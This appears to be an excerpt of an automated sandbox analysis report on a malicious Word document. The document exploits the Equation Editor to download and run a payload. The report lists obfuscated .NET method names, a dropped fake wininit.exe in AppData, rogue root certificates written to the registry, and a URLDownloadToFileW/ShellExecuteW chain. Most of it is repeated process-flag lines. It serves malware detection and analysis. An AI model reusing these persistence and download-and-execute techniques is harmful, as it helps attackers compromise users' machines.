                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540499
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
